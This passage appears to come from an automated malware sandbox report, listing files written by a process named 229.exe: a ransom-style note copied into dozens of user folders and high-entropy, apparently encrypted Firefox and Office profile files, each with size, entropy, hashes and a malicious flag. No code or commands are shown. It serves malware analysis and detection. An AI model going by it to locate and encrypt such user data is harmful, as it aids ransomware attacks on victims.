SHA-512:	FE19180288950EE49FBAEFBB693670809E54EE87F418092E135D11F299DC2549B63EA52D88FEAB6A1712244EDDE2794C5B29445764E141C9C56ACF5CA98024B4
Malicious:	true

C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\User\PSVULHG-MANUAL.txt Download File
Process:	C:\Windows\Temp\229.exe
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with CRLF line terminators
Size (bytes):	8586
Entropy (8bit):	4.017115407543283
Encrypted:	false
MD5:	7A8ABC7C7F4A8D0030F383C778B9EE6A
SHA1:	1743CA81E307F7AC52E630638EA5980FD7BA3A43
SHA-256:	A9AEE686DB563C16DF580F9E43703585E594046B78E27607BE0A3D92C5584F99
SHA-512:	FE19180288950EE49FBAEFBB693670809E54EE87F418092E135D11F299DC2549B63EA52D88FEAB6A1712244EDDE2794C5B29445764E141C9C56ACF5CA98024B4
Malicious:	true

C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\User\SmartArt Graphics\1033\PSVULHG-MANUAL.txt Download File
Process:	C:\Windows\Temp\229.exe
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with CRLF line terminators
Size (bytes):	8586
Entropy (8bit):	4.017115407543283
Encrypted:	false
MD5:	7A8ABC7C7F4A8D0030F383C778B9EE6A
SHA1:	1743CA81E307F7AC52E630638EA5980FD7BA3A43
SHA-256:	A9AEE686DB563C16DF580F9E43703585E594046B78E27607BE0A3D92C5584F99
SHA-512:	FE19180288950EE49FBAEFBB693670809E54EE87F418092E135D11F299DC2549B63EA52D88FEAB6A1712244EDDE2794C5B29445764E141C9C56ACF5CA98024B4
Malicious:	true

C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\User\SmartArt Graphics\PSVULHG-MANUAL.txt Download File
Process:	C:\Windows\Temp\229.exe
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with CRLF line terminators
Size (bytes):	8586
Entropy (8bit):	4.017115407543283
Encrypted:	false
MD5:	7A8ABC7C7F4A8D0030F383C778B9EE6A
SHA1:	1743CA81E307F7AC52E630638EA5980FD7BA3A43
SHA-256:	A9AEE686DB563C16DF580F9E43703585E594046B78E27607BE0A3D92C5584F99
SHA-512:	FE19180288950EE49FBAEFBB693670809E54EE87F418092E135D11F299DC2549B63EA52D88FEAB6A1712244EDDE2794C5B29445764E141C9C56ACF5CA98024B4
Malicious:	true

C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\User\Word Document Building Blocks\1033\PSVULHG-MANUAL.txt Download File
Process:	C:\Windows\Temp\229.exe
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with CRLF line terminators
Size (bytes):	8586
Entropy (8bit):	4.017115407543283
Encrypted:	false
MD5:	7A8ABC7C7F4A8D0030F383C778B9EE6A
SHA1:	1743CA81E307F7AC52E630638EA5980FD7BA3A43
SHA-256:	A9AEE686DB563C16DF580F9E43703585E594046B78E27607BE0A3D92C5584F99
SHA-512:	FE19180288950EE49FBAEFBB693670809E54EE87F418092E135D11F299DC2549B63EA52D88FEAB6A1712244EDDE2794C5B29445764E141C9C56ACF5CA98024B4
Malicious:	true

C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\User\Word Document Building Blocks\PSVULHG-MANUAL.txt Download File
Process:	C:\Windows\Temp\229.exe
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with CRLF line terminators
Size (bytes):	8586
Entropy (8bit):	4.017115407543283
Encrypted:	false
MD5:	7A8ABC7C7F4A8D0030F383C778B9EE6A
SHA1:	1743CA81E307F7AC52E630638EA5980FD7BA3A43
SHA-256:	A9AEE686DB563C16DF580F9E43703585E594046B78E27607BE0A3D92C5584F99
SHA-512:	FE19180288950EE49FBAEFBB693670809E54EE87F418092E135D11F299DC2549B63EA52D88FEAB6A1712244EDDE2794C5B29445764E141C9C56ACF5CA98024B4
Malicious:	true

C:\Users\user\AppData\Roaming\Microsoft\Templates\Normal.dotm Download File
Process:	C:\Windows\Temp\229.exe
File Type:	data
Size (bytes):	21067
Entropy (8bit):	7.990529413501369
Encrypted:	true
MD5:	DF6BE2DA118F81354F9CBDF3EB73B34D
SHA1:	08ECC643F0FD0481D2401337F05C2677A1D25E7C
SHA-256:	ED68947F86B66152682015F074F39F71816E593EA9B80CD70C9375118BD6EBA1
SHA-512:	7A60C3ACCE888A587740B50E22CE6031613B971F601FCD9CBB108EE145D980CAAA2283A6CDF990876B628E8F604DF5483793F895DBB5DD31B3889A16BE7FE016
Malicious:	false

C:\Users\user\AppData\Roaming\Microsoft\Templates\PSVULHG-MANUAL.txt Download File
Process:	C:\Windows\Temp\229.exe
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with CRLF line terminators
Size (bytes):	8586
Entropy (8bit):	4.017115407543283
Encrypted:	false
MD5:	7A8ABC7C7F4A8D0030F383C778B9EE6A
SHA1:	1743CA81E307F7AC52E630638EA5980FD7BA3A43
SHA-256:	A9AEE686DB563C16DF580F9E43703585E594046B78E27607BE0A3D92C5584F99
SHA-512:	FE19180288950EE49FBAEFBB693670809E54EE87F418092E135D11F299DC2549B63EA52D88FEAB6A1712244EDDE2794C5B29445764E141C9C56ACF5CA98024B4
Malicious:	true

C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm Download File
Process:	C:\Windows\Temp\229.exe
File Type:	data
Size (bytes):	702
Entropy (8bit):	7.697243385747153
Encrypted:	false
MD5:	A14B512499103798E9E5B0B075FEC952
SHA1:	BA14CCB4BFB63A8EB3FB565A2096557567F142BA
SHA-256:	686AA50245C2994365CF25967E2033C58A27ADE071D196DC863B7FE27311E61D
SHA-512:	43F50D4437919A279B7FCF7D0505920B959932BA5CA39C420C9093555426976438594D140CFDF0946552D9B117A3FC4E759D61859D499D86D1A2A4E67E90B4EF
Malicious:	false

C:\Users\user\AppData\Roaming\Microsoft\UProof\CUSTOM.DIC Download File
Process:	C:\Windows\Temp\229.exe
File Type:	data
Size (bytes):	542
Entropy (8bit):	7.530827888006161
Encrypted:	false
MD5:	425FD602F3497AD653C89A0E2E507D2C
SHA1:	F90153ADB3E289FE85DE2C40C686469084546C71
SHA-256:	0635D4495DF866E6841921F61D0C7EEEBA964048873B4F716B33FE881BD1633C
SHA-512:	D956749D303306F378CD303ADAFCBA89856B1C51E3AD1B15B857C0264A80C2928ACB3A8F1E11BBAD808C8462FC2B0E6A6D22E04E503FD84F8BE23C4D55D6BC53
Malicious:	false

C:\Users\user\AppData\Roaming\Microsoft\UProof\PSVULHG-MANUAL.txt Download File
Process:	C:\Windows\Temp\229.exe
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with CRLF line terminators
Size (bytes):	8586
Entropy (8bit):	4.017115407543283
Encrypted:	false
MD5:	7A8ABC7C7F4A8D0030F383C778B9EE6A
SHA1:	1743CA81E307F7AC52E630638EA5980FD7BA3A43
SHA-256:	A9AEE686DB563C16DF580F9E43703585E594046B78E27607BE0A3D92C5584F99
SHA-512:	FE19180288950EE49FBAEFBB693670809E54EE87F418092E135D11F299DC2549B63EA52D88FEAB6A1712244EDDE2794C5B29445764E141C9C56ACF5CA98024B4
Malicious:	true

C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\PSVULHG-MANUAL.txt Download File
Process:	C:\Windows\Temp\229.exe
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with CRLF line terminators
Size (bytes):	8586
Entropy (8bit):	4.017115407543283
Encrypted:	false
MD5:	7A8ABC7C7F4A8D0030F383C778B9EE6A
SHA1:	1743CA81E307F7AC52E630638EA5980FD7BA3A43
SHA-256:	A9AEE686DB563C16DF580F9E43703585E594046B78E27607BE0A3D92C5584F99
SHA-512:	FE19180288950EE49FBAEFBB693670809E54EE87F418092E135D11F299DC2549B63EA52D88FEAB6A1712244EDDE2794C5B29445764E141C9C56ACF5CA98024B4
Malicious:	true

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\LKZCX81L1KSHPQ1HT8F5.temp Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Size (bytes):	8016
Entropy (8bit):	3.550792574679043
Encrypted:	false
MD5:	C2785926579DB93FDFE03B65262EFDC4
SHA1:	7387BD4540CAA1A7CC77E300F5C5EB3AB280E17D
SHA-256:	3E9AF52670E9E03A44B8BADD399A63E9591578951CAA2E7B8944FBA268BFAB0E
SHA-512:	0FEC6622C54451795FFBF8D8E12FE1C56C66F7A2A40128E9255DC3ECDB829CA38EDFE9F439CEB74FCB02987CFBCB7FD6DB0EE0C18B1BE3460751B1F56B65CBD6
Malicious:	false

C:\Users\user\AppData\Roaming\Microsoft\Word\PSVULHG-MANUAL.txt Download File
Process:	C:\Windows\Temp\229.exe
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with CRLF line terminators
Size (bytes):	8586
Entropy (8bit):	4.017115407543283
Encrypted:	false
MD5:	7A8ABC7C7F4A8D0030F383C778B9EE6A
SHA1:	1743CA81E307F7AC52E630638EA5980FD7BA3A43
SHA-256:	A9AEE686DB563C16DF580F9E43703585E594046B78E27607BE0A3D92C5584F99
SHA-512:	FE19180288950EE49FBAEFBB693670809E54EE87F418092E135D11F299DC2549B63EA52D88FEAB6A1712244EDDE2794C5B29445764E141C9C56ACF5CA98024B4
Malicious:	true

C:\Users\user\AppData\Roaming\Microsoft\Word\STARTUP\PSVULHG-MANUAL.txt Download File
Process:	C:\Windows\Temp\229.exe
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with CRLF line terminators
Size (bytes):	8586
Entropy (8bit):	4.017115407543283
Encrypted:	false
MD5:	7A8ABC7C7F4A8D0030F383C778B9EE6A
SHA1:	1743CA81E307F7AC52E630638EA5980FD7BA3A43
SHA-256:	A9AEE686DB563C16DF580F9E43703585E594046B78E27607BE0A3D92C5584F99
SHA-512:	FE19180288950EE49FBAEFBB693670809E54EE87F418092E135D11F299DC2549B63EA52D88FEAB6A1712244EDDE2794C5B29445764E141C9C56ACF5CA98024B4
Malicious:	true

C:\Users\user\AppData\Roaming\Mozilla\Extensions\PSVULHG-MANUAL.txt Download File
Process:	C:\Windows\Temp\229.exe
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with CRLF line terminators
Size (bytes):	8586
Entropy (8bit):	4.017115407543283
Encrypted:	false
MD5:	7A8ABC7C7F4A8D0030F383C778B9EE6A
SHA1:	1743CA81E307F7AC52E630638EA5980FD7BA3A43
SHA-256:	A9AEE686DB563C16DF580F9E43703585E594046B78E27607BE0A3D92C5584F99
SHA-512:	FE19180288950EE49FBAEFBB693670809E54EE87F418092E135D11F299DC2549B63EA52D88FEAB6A1712244EDDE2794C5B29445764E141C9C56ACF5CA98024B4
Malicious:	true

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Crash Reports\InstallTime20150305021524 Download File
Process:	C:\Windows\Temp\229.exe
File Type:	data
Size (bytes):	550
Entropy (8bit):	7.573501299832237
Encrypted:	false
MD5:	EA2CD96E528D88B0937A90F1092FF920
SHA1:	479F478BE16A013F4DF46F4AAA1F31B632DDD072
SHA-256:	399C6B4DBD444C74EAFEE8AC01FD3CD92042E6EEE110274CD9CB92AD994C93DB
SHA-512:	60C963FBD3784D7C0F93FA4E00046EF00F1AFE6BD2C516A20F9AD1709FB255965FCE6D4AC0C21C3538D3F70536C86244B4D6DE926266DE7B6D74A28AADC57D31
Malicious:	false

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Crash Reports\InstallTime20151216175450 Download File
Process:	C:\Windows\Temp\229.exe
File Type:	data
Size (bytes):	550
Entropy (8bit):	7.506387764733927
Encrypted:	false
MD5:	9A04A2D1AF84215F725CE0E543C4AB97
SHA1:	CDD63DF2169CA3FA95C904925DFD341B4616B4D1
SHA-256:	F56174D9D4DC05DDF7E694B63EA104CEB5E6F343C131A65A794081C232161B26
SHA-512:	01F3893955E426066B95136CBC82AD12190E032F5747A3A8E0E8DBBCC7572E9DEB403B6BE6DB196525CDDED583A2EBAA4E37C1F01ABB12FEA6A6F465D8DFCB3A
Malicious:	false

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Crash Reports\PSVULHG-MANUAL.txt Download File
Process:	C:\Windows\Temp\229.exe
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with CRLF line terminators
Size (bytes):	8586
Entropy (8bit):	4.017115407543283
Encrypted:	false
MD5:	7A8ABC7C7F4A8D0030F383C778B9EE6A
SHA1:	1743CA81E307F7AC52E630638EA5980FD7BA3A43
SHA-256:	A9AEE686DB563C16DF580F9E43703585E594046B78E27607BE0A3D92C5584F99
SHA-512:	FE19180288950EE49FBAEFBB693670809E54EE87F418092E135D11F299DC2549B63EA52D88FEAB6A1712244EDDE2794C5B29445764E141C9C56ACF5CA98024B4
Malicious:	true

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Crash Reports\events\PSVULHG-MANUAL.txt Download File
Process:	C:\Windows\Temp\229.exe
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with CRLF line terminators
Size (bytes):	8586
Entropy (8bit):	4.017115407543283
Encrypted:	false
MD5:	7A8ABC7C7F4A8D0030F383C778B9EE6A
SHA1:	1743CA81E307F7AC52E630638EA5980FD7BA3A43
SHA-256:	A9AEE686DB563C16DF580F9E43703585E594046B78E27607BE0A3D92C5584F99
SHA-512:	FE19180288950EE49FBAEFBB693670809E54EE87F418092E135D11F299DC2549B63EA52D88FEAB6A1712244EDDE2794C5B29445764E141C9C56ACF5CA98024B4
Malicious:	true

C:\Users\user\AppData\Roaming\Mozilla\Firefox\PSVULHG-MANUAL.txt Download File
Process:	C:\Windows\Temp\229.exe
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with CRLF line terminators
Size (bytes):	8586
Entropy (8bit):	4.017115407543283
Encrypted:	false
MD5:	7A8ABC7C7F4A8D0030F383C778B9EE6A
SHA1:	1743CA81E307F7AC52E630638EA5980FD7BA3A43
SHA-256:	A9AEE686DB563C16DF580F9E43703585E594046B78E27607BE0A3D92C5584F99
SHA-512:	FE19180288950EE49FBAEFBB693670809E54EE87F418092E135D11F299DC2549B63EA52D88FEAB6A1712244EDDE2794C5B29445764E141C9C56ACF5CA98024B4
Malicious:	true

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\PSVULHG-MANUAL.txt Download File
Process:	C:\Windows\Temp\229.exe
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with CRLF line terminators
Size (bytes):	8586
Entropy (8bit):	4.017115407543283
Encrypted:	false
MD5:	7A8ABC7C7F4A8D0030F383C778B9EE6A
SHA1:	1743CA81E307F7AC52E630638EA5980FD7BA3A43
SHA-256:	A9AEE686DB563C16DF580F9E43703585E594046B78E27607BE0A3D92C5584F99
SHA-512:	FE19180288950EE49FBAEFBB693670809E54EE87F418092E135D11F299DC2549B63EA52D88FEAB6A1712244EDDE2794C5B29445764E141C9C56ACF5CA98024B4
Malicious:	true

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\SiteSecurityServiceState.txt Download File
Process:	C:\Windows\Temp\229.exe
File Type:	data
Size (bytes):	1223
Entropy (8bit):	7.8132442427258235
Encrypted:	false
MD5:	57AC7B625EDE966699ED4C0FE661B425
SHA1:	D8738CFA87AC3EAD1CCF15B946E9D22991D28D8D
SHA-256:	76A307C52D3A657428EABCC0791DD2894CC51111920FCFDE8DAC13C00E7BFF20
SHA-512:	D40F331302AD4C6BC08F53F31B4E8BAC0D26110249FBDBB18E564C6900115CF732BCE3A0E590B9D251A23C8EF46C198D9B85767BB9C118A921F09D2035A6620F
Malicious:	true

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\addons.json Download File
Process:	C:\Windows\Temp\229.exe
File Type:	data
Size (bytes):	564
Entropy (8bit):	7.547492256153007
Encrypted:	false
MD5:	B87779C37F9C6E61FBEEB298C30EAA32
SHA1:	A0BBABC5344CC7F35AA26496C815BDFCEE2438F5
SHA-256:	9831987201E13E17C3ABFB284EA3D597853D53C37D0612B9B5C1EE3E5267A3C4
SHA-512:	A1AE9DD8B9AF3180726D9CF791CDFE2FDCD187B2B069EF396F1B050C068EC5300753594DD815B3522D09CA2D4B2A97EAE5CA1522FB822CDBCEA7275FCDEF4541
Malicious:	true

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\blocklist.xml Download File
Process:	C:\Windows\Temp\229.exe
File Type:	data
Size (bytes):	189369
Entropy (8bit):	7.999005110993806
Encrypted:	true
MD5:	765A936ECAC98CC18F280A81C8716B25
SHA1:	593627E3D5B71039FC64941D474099D7B34E5B06
SHA-256:	EF16C31F720B0B74A0BDCCB07E5D6716AE1FDAD17C4F525CDDB8EA03D0504A1B
SHA-512:	B75AD2291C8864BEC4618D4692D5AA457EEB87B46D2696FD76AEA9CA028A2B311CDE096A45E6D1DC6454A1E8E5F803E9BE350CA7D1E5A5D9A42A03E9C63EDFA6
Malicious:	true

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\bookmarkbackups\PSVULHG-MANUAL.txt Download File
Process:	C:\Windows\Temp\229.exe
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with CRLF line terminators
Size (bytes):	8586
Entropy (8bit):	4.017115407543283
Encrypted:	false
MD5:	7A8ABC7C7F4A8D0030F383C778B9EE6A
SHA1:	1743CA81E307F7AC52E630638EA5980FD7BA3A43
SHA-256:	A9AEE686DB563C16DF580F9E43703585E594046B78E27607BE0A3D92C5584F99
SHA-512:	FE19180288950EE49FBAEFBB693670809E54EE87F418092E135D11F299DC2549B63EA52D88FEAB6A1712244EDDE2794C5B29445764E141C9C56ACF5CA98024B4
Malicious:	true

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\cert8.db Download File
Process:	C:\Windows\Temp\229.exe
File Type:	data
Size (bytes):	66076
Entropy (8bit):	7.997099093590863
Encrypted:	true
MD5:	BE5CE69F1DDCD0E16A0D40B165D72257
SHA1:	E46D91025497F6F2ABCB97BA120051C1CA9ADE52
SHA-256:	542A5C537169AC16CB89E105242B7C9335FB73793E9A8F3BE2FDCFC420264443
SHA-512:	9EAB466E53234501632F3B85D64DA8B34394C32208412A0A4BE2EB473AC63CD5AC5DF1017C9E0A511EED76972C828F8C7714E2F84056EC0921193BF00DECC746
Malicious:	true

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\cert_override.txt Download File
Process:	C:\Windows\Temp\229.exe
File Type:	data
Size (bytes):	907
Entropy (8bit):	7.7385959762853656
Encrypted:	false
MD5:	32921757571FCCC817E8E50A331BA9B8
SHA1:	7E1C731D56A2337CA846142E5AF0A5B6EECED8F2
SHA-256:	9B2ACF70D3E831223752A42ED37DAD3EB652F68DFF729467B1BF6DC6C10C4D18
SHA-512:	B2303D8C89CADD30DE91E4D35BBEE4440801D0B1D4621FE08AC5E451E2A1C4A82377B8437E91F0D248BDE0A662E736DB3A3F181EE2DBE1A14F2538AA5487B3AD
Malicious:	true

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\compatibility.ini Download File
Process:	C:\Windows\Temp\229.exe
File Type:	data
Size (bytes):	736
Entropy (8bit):	7.651405010269383
Encrypted:	false
MD5:	DE4601887DD641308D33F237C57A79D5
SHA1:	082B017EC71D743E0608765E700065270670E6A0
SHA-256:	90DA5F54855F63D2104494EACE37CE1143A35B335DA625554B5A0AFA03304A43
SHA-512:	284E91F3C45471D86F7516ECC2564ACCD2579C684B6F191C8C495504EA166BB60EA950BE8BE54B651B1E9C8C8274257095CDA01F78CE70CF7DBE5BC210BFCCB5
Malicious:	true

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\content-prefs.sqlite Download File
Process:	C:\Windows\Temp\229.exe
File Type:	data
Size (bytes):	229916
Entropy (8bit):	7.999209528568746
Encrypted:	true
MD5:	A9DAEB4E218B0EE94C968F58A9EFBED8
SHA1:	024D8CEE4A9998F0DE7C020D9F04557DC54483A6
SHA-256:	D4751515E669AE5B4293D051F42ADD9936880514D1A8837CB2EF64AC9577F7FE
SHA-512:	79AE32394330922CEF0E2D9C69994AB88060419041D66C20DA16F8963D916182285B22A8A9138DFBEF1256E5CE1F90B51E5F6ED0155866C55187AB9EB387114C
Malicious:	true

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\cookies.sqlite Download File
Process:	C:\Windows\Temp\229.exe
File Type:	data
Size (bytes):	524828
Entropy (8bit):	7.999601994109758
Encrypted:	true
MD5:	90F7ACE6B48BB669FA2D5D4BFEC16244
SHA1:	BDAC8060ED25476C788707B97D7F4727920779A4
SHA-256:	7CC7A97D17E65E67E89725F2218B25E27F8022454C50F7D603392BB38B261875
SHA-512:	0571AA4A014D60DB8807A0AC1311AF9346BFA50916D410269C481AF07682B3D09A0144AA15721A04C5D327C40CA007DEC53BA9DD43E2230468FB38BB16C0CDFD
Malicious:	true

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\crashes\PSVULHG-MANUAL.txt Download File
Process:	C:\Windows\Temp\229.exe
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with CRLF line terminators
Size (bytes):	8586
Entropy (8bit):	4.017115407543283
Encrypted:	false
MD5:	7A8ABC7C7F4A8D0030F383C778B9EE6A
SHA1:	1743CA81E307F7AC52E630638EA5980FD7BA3A43
SHA-256:	A9AEE686DB563C16DF580F9E43703585E594046B78E27607BE0A3D92C5584F99
SHA-512:	FE19180288950EE49FBAEFBB693670809E54EE87F418092E135D11F299DC2549B63EA52D88FEAB6A1712244EDDE2794C5B29445764E141C9C56ACF5CA98024B4
Malicious:	true

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\crashes\events\PSVULHG-MANUAL.txt Download File
Process:	C:\Windows\Temp\229.exe
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with CRLF line terminators
Size (bytes):	8586
Entropy (8bit):	4.017115407543283
Encrypted:	false
MD5:	7A8ABC7C7F4A8D0030F383C778B9EE6A
SHA1:	1743CA81E307F7AC52E630638EA5980FD7BA3A43
SHA-256:	A9AEE686DB563C16DF580F9E43703585E594046B78E27607BE0A3D92C5584F99
SHA-512:	FE19180288950EE49FBAEFBB693670809E54EE87F418092E135D11F299DC2549B63EA52D88FEAB6A1712244EDDE2794C5B29445764E141C9C56ACF5CA98024B4
Malicious:	true

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\crashes\store.json.mozlz4 Download File
Process:	C:\Windows\Temp\229.exe
File Type:	data
Size (bytes):	606
Entropy (8bit):	7.603490901603154
Encrypted:	false
MD5:	C3A2DBC4C7055866BB9FD5E03A7B8885
SHA1:	C77B6AA82C763EB7E3C155B6CEFBBA8F80E5DEB7
SHA-256:	DB9FCB5E73F04AC5691A36074E809556591F5314DA67D489B7B5584D6F7FBCE8
SHA-512:	F8B9080DE60016AFDEB4BE1083330455A0FADDDA212FB4F5C308EE3CEABE280F0802A61A65805D37571414901A40FAB8C8AAD9CDF3B5705F34647D5A280C6AC5
Malicious:	true

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\datareporting\PSVULHG-MANUAL.txt Download File
Process:	C:\Windows\Temp\229.exe
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with CRLF line terminators
Size (bytes):	8586
Entropy (8bit):	4.017115407543283
Encrypted:	false
MD5:	7A8ABC7C7F4A8D0030F383C778B9EE6A
SHA1:	1743CA81E307F7AC52E630638EA5980FD7BA3A43
SHA-256:	A9AEE686DB563C16DF580F9E43703585E594046B78E27607BE0A3D92C5584F99
SHA-512:	FE19180288950EE49FBAEFBB693670809E54EE87F418092E135D11F299DC2549B63EA52D88FEAB6A1712244EDDE2794C5B29445764E141C9C56ACF5CA98024B4
Malicious:	true

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\datareporting\archived\2016-12\1482239458107.804b5b8e-3057-4315-ada7-6389f240c010.main.jsonlz4 Download File
Process:	C:\Windows\Temp\229.exe
File Type:	data
Size (bytes):	5791
Entropy (8bit):	7.9663061015635055
Encrypted:	false
MD5:	101BD7E495869109FD1DBDE8C07D282F
SHA1:	B3E66349D27E9962195C1DAFF1D26EED9647B6C9
SHA-256:	909F4B0F386EF95FDA495027802F1C93BE2DFE90A23F603284A3F8C04CEF793F
SHA-512:	A79567EC7BB1D2C948EB15B6EC0E37F9C41810FA521169B55FC7394DF03788AFF9D77107B8E9020B036EEB8EA5F162DC5668F4C9365F0B51A92F10954B268CF7
Malicious:	true

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\datareporting\archived\2016-12\1482239617617.0675a2f8-c025-4cb1-98bc-4a943648cf69.main.jsonlz4 Download File
Process:	C:\Windows\Temp\229.exe
File Type:	data
Size (bytes):	5737
Entropy (8bit):	7.971858055217245
Encrypted:	false
MD5:	ED6AC5E7CF5D859F8AE3031B1C72F1A3
SHA1:	5618F014526D879213FB4B2BE852DE0E67C845BC
SHA-256:	B556F2A667740A911A3BAABBA8AF40C5FCD8D8D8A4BA09293BF003DA03516AE0
SHA-512:	F4DA8C7F04F983C504D906B2339E8A07EB9919B41219F82C9CF15D0617B7BFCDA21E9F3ACE131DEF0DFF267F8CE188993A8B7749C3979BC1508345147F8C178B
Malicious:	true

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\datareporting\archived\2016-12\1482239777499.026c3ebc-c6e0-47be-bdb8-30f2cf4bf8d6.main.jsonlz4 Download File
Process:	C:\Windows\Temp\229.exe
File Type:	data
Size (bytes):	5871
Entropy (8bit):	7.964433165696767
Encrypted:	false
MD5:	155A407505ED2188CBE441C02537A637
SHA1:	2C3FF9BB8D5CF3EB152BF98B385E7BB4CCC9D82F
SHA-256:	2131E5086B33C4D61791EE00CC20B29EDF526D090184CBC3C783B85DF6410809
SHA-512:	62F34E54D1BF3255FAE47A3CE816A0634501B12102D9FEDAE5535519D96450E9798DBD8C053584A3EA6B06A2ADE29B8D825BF8AA1DF0358A75FAED1950837FC8
Malicious:	true

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\datareporting\archived\2016-12\PSVULHG-MANUAL.txt Download File
Process:	C:\Windows\Temp\229.exe
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with CRLF line terminators
Size (bytes):	8586
Entropy (8bit):	4.017115407543283
Encrypted:	false
MD5:	7A8ABC7C7F4A8D0030F383C778B9EE6A
SHA1:	1743CA81E307F7AC52E630638EA5980FD7BA3A43
SHA-256:	A9AEE686DB563C16DF580F9E43703585E594046B78E27607BE0A3D92C5584F99
SHA-512:	FE19180288950EE49FBAEFBB693670809E54EE87F418092E135D11F299DC2549B63EA52D88FEAB6A1712244EDDE2794C5B29445764E141C9C56ACF5CA98024B4
Malicious:	true

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\datareporting\archived\PSVULHG-MANUAL.txt Download File
Process:	C:\Windows\Temp\229.exe
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with CRLF line terminators
Size (bytes):	8586
Entropy (8bit):	4.017115407543283
Encrypted:	false
MD5:	7A8ABC7C7F4A8D0030F383C778B9EE6A
SHA1:	1743CA81E307F7AC52E630638EA5980FD7BA3A43
SHA-256:	A9AEE686DB563C16DF580F9E43703585E594046B78E27607BE0A3D92C5584F99
SHA-512:	FE19180288950EE49FBAEFBB693670809E54EE87F418092E135D11F299DC2549B63EA52D88FEAB6A1712244EDDE2794C5B29445764E141C9C56ACF5CA98024B4
Malicious:	true

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\datareporting\session-state.json Download File
Process:	C:\Windows\Temp\229.exe
File Type:	data
Size (bytes):	675
Entropy (8bit):	7.6608368207579565
Encrypted:	false
MD5:	69D6B5C5B4E2897618E364713A385998
SHA1:	7C0A97088AE3176AF65804E8EA006D0DD857040F
SHA-256:	E438EAFBC5054CC3E1B1AC94EF55E89284ACF11A520FB2909E7AA74368212C87
SHA-512:	728B40FAFDED9FA723CADC882C373C26A2EDC560D9B11BFAF48B13F5B720487588E70890B4D54BD707C39A2CA2736DBA4B31E2265A1520CAA685D99FE14DE044
Malicious:	true

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\datareporting\state.json Download File
Process:	C:\Windows\Temp\229.exe
File Type:	data
Size (bytes):	591
Entropy (8bit):	7.569993108422597
Encrypted:	false
MD5:	9583ED918805C870A93E235BD1C49D65
SHA1:	A7D5D7893F2168311CD3C842C15CDABF535BFF12
SHA-256:	CF6E79D19F7934C35A2DC2635DB2FB1B5C1ADF9363EF379073C5404C98CD1D48
SHA-512:	FBFA7723334C6B936761D66F2EEF38FF6BD5963E5AE7E909DF38717A9EF01CF205EC7F6E824A36B7E149A847FD3C2A155AC10938C7287C9A14CCEDF91183F1AA
Malicious:	true

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\extensions.ini Download File
Process:	C:\Windows\Temp\229.exe
File Type:	data
Size (bytes):	715
Entropy (8bit):	7.699955370374074
Encrypted:	false
MD5:	2F63BD44C68E19C7FC0B878445A3756F
SHA1:	30E15065C5A613AE2D0E3A11CB55526787A7F702
SHA-256:	32834FC149915157E8B6296B3A3B186E26E2CAFFC357A3422F8742CBC15D63DE
SHA-512:	435C0421BBA1BEC408BD6D3DBE1C2B6955D756004313BF595C1FCB05B20A2A8BB0360D36DA20E4D5AA87D9111FDDEFCAD15C718A8ECFC5211E86123408881327
Malicious:	false

